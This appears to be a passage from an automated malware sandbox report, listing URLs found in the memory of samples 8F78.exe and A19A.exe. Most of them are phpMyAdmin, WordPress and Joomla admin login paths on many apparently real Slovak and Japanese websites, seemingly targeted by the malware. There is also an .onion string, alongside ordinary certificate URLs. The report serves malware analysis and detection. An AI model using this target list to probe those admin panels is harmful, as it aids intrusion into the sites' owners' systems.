                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kompresory-servis.sk/administrator/g
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kompresory-servis.sk/administrator/n
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kompresory-servis.sk/f
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kompresory-servis.sk/in
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kompresory-servis.sk/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kompresory-servis.sk/phpMyAdmin/s
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kompresory-servis.sk/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DA9000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003CFF000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kompresory-servis.sk/pma/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kompresory-servis.sk/pma/Admin/$
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kompresory-servis.sk/pma/Admin/eN
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kompresory-servis.sk/pma/z
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kompresory-servis.sk/x
                                Source: 8F78.exe, 00000007.00000002.3658884615.0000000003A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://konic.co.jp/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://konic.co.jp/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://konic.co.jp/administrator/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://konic.co.jp/administrator/index.php
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://konic.co.jp/administrator/l.sk
                                Source: 8F78.exe, 00000007.00000002.3658884615.0000000003A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://konic.co.jp/dio.co.jp
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://konic.co.jp/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://konic.co.jp/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://konic.co.jp/pma/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://konic.co.jp/pma/Admin/k
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://magokorokan.com/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://magokorokan.com/PhpMyAdmin/G
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://magokorokan.com/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://magokorokan.com/phpMyAdmin/c
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040CB000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://magokorokan.com/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://magokorokan.com/phpmyadmin/3
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://magokorokan.com/phpmyadmin/om
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://merlynsociety.com/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040CB000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://merlynsociety.com/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3743164281.0000000004121000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://merlynsociety.com/administrator/
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://merlynsociety.com/administrator/index.php
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://merlynsociety.com/administrator/index.php65lhost
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://merlynsociety.com/administrator/index.phpocalhost
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://merlynsociety.com/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040CB000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3743164281.0000000004121000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://merlynsociety.com/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://merlynsociety.com/phpmyadmin/a
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://merlynsociety.com/wp-admin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nakacho.com/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nakacho.com/.se:21I
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nakacho.com/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nakacho.com/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nakacho.com/phpMyAdmin/(
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nakacho.com/phpMyAdmin/v
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nakacho.com/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nakacho.com/phpmyadmin/B
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nakacho.com/pma/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nakacho.com/pma/9
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nippondotech.co.jp/
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004224000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nippondotech.co.jp/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nippondotech.co.jp/administrator/index.php
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004224000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nippondotech.co.jp/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004224000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nippondotech.co.jp/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nippondotech.co.jp/pma/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nippondotech.co.jp/pma/h
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DC3000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3658884615.0000000003A12000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com(11):
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3685374127.0000000003EC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                                Source: explorer.exe, 00000001.00000000.1699278229.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1700756289.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                Source: A19A.exe, 00000008.00000003.2025907926.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026608376.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2027233927.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026473695.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026051969.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028689956.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028015077.00000208D2DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                                Source: A19A.exe, 00000008.00000003.2025907926.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026608376.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2027233927.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026473695.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026051969.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028689956.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028015077.00000208D2DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                                Source: explorer.exe, 00000001.00000000.1699278229.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                                Source: A19A.exe, 00000008.00000003.2029883688.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2030515756.00000208D2DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.startssl.com00
                                Source: A19A.exe, 00000008.00000003.2029883688.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2030515756.00000208D2DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.startssl.com07
                                Source: A19A.exe, 00000008.00000003.2025907926.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026608376.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2027233927.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026473695.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026051969.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028689956.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2029883688.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028015077.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2030515756.00000208D2DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040BD000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://oitacity.jp/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://oitacity.jp/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://oitacity.jp/c
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://oitacity.jp/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://oitacity.jp/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://oitacity.jp/pma/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://oitacity.jp/pma/Admin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://oitacity.jp/pma/admin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://piaggio-bratislava.sk/
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://piaggio-bratislava.sk/administrator/index.php
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://piaggio-bratislava.sk/wp-login.php
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://piaggio-bratislava.sk/wp-login.phpp
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://predajpaliet.sk/administrator/
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0F
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/ogvX
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/ctnca.cer
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038E1000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3658884615.0000000003A12000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3685374127.0000000003F2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/ctnca.cer09
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/dvcasha2.cer
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/dvcasha2.cer0
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/gscasha2.cer
                                Source: 8F78.exe, 00000007.00000002.3640005281.00000000036E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/hsha2.cer
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://reproma.sk/administrator/
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s-kotobuki-s.co.jp/administrator/
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s-kotobuki-s.co.jp/administrator/k4mmfco6oqxsqd.onion
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s-kotobuki-s.co.jp/phpMyAdmin/
                                Source: explorer.exe, 00000001.00000000.1701672498.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1700329004.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1699945276.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sluchatka.sk/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sluchatka.sk/PhpMyAdmin/2
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sluchatka.sk/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sluchatka.sk/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sluchatka.sk/phpmyadmin/?
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sluchatka.sk/pma/
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://spona-na-ponozky.sk/PhpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://spona-na-ponozky.sk/PhpMyAdmin/kX
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://spona-na-ponozky.sk/wp-login.php
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sport-tour.sk/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sport-tour.sk/phpmyadmin/t
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://st-comet.com/
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://straznyanjel.sk/administrator/
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://straznyanjel.sk/phpMyAdmin/
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://straznyanjel.sk/phpMyAdmin/r/index.php
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://straznyanjel.sk/wp-login.php
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://straznyanjel.sk/wp-login.php/index.php
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://straznyanjel.sk/wp-login.phpk
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038E1000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3658884615.0000000003A12000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3685374127.0000000003F2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://subca.ocsp-certum.com01
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://subca.ocsp-certum.com04
                                Source: A19A.exe, 00000008.00000003.2025907926.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026608376.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2027233927.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026473695.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026051969.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028689956.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2029883688.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028015077.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2030515756.00000208D2DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                Source: A19A.exe, 00000008.00000003.2025907926.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026608376.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2027233927.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026473695.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026051969.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028689956.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2029883688.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028015077.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2030515756.00000208D2DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                Source: A19A.exe, 00000008.00000003.2025907926.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026608376.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2027233927.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026473695.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026051969.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028689956.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2029883688.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028015077.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2030515756.00000208D2DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tsutomu.com/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040CB000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abatek.sk/wp-admin/
                                Source: explorer.exe, 00000001.00000000.1702956884.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038E1000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3685374127.0000000003F2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certum.pl/CPS
                                Source: 8F78.exe, 00000007.00000002.3658884615.0000000003A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certum.pl/CPS6
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certum.pl/CPSnckuliy
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certum.pl/CPSnckuliyy
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.detmar.sk/administrator/
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.kompresory-servis.sk/administrator/
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.kompresory-servis.sk/administrator//D
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.kompresory-servis.sk/administrator/r/y-katalog.sk
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003F07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oitacity.jp/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3523875772.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
                                Source: 8F78.exe, 00000007.00000002.3523875772.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.htmlTYPE=2OpenSSL
                                Source: A19A.exe, 00000008.00000003.2031414417.00000208D2DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/dev/peps/pep-0205/
                                Source: A19A.exe, 00000008.00000003.2029883688.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2030515756.00000208D2DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.startssl.com/0P
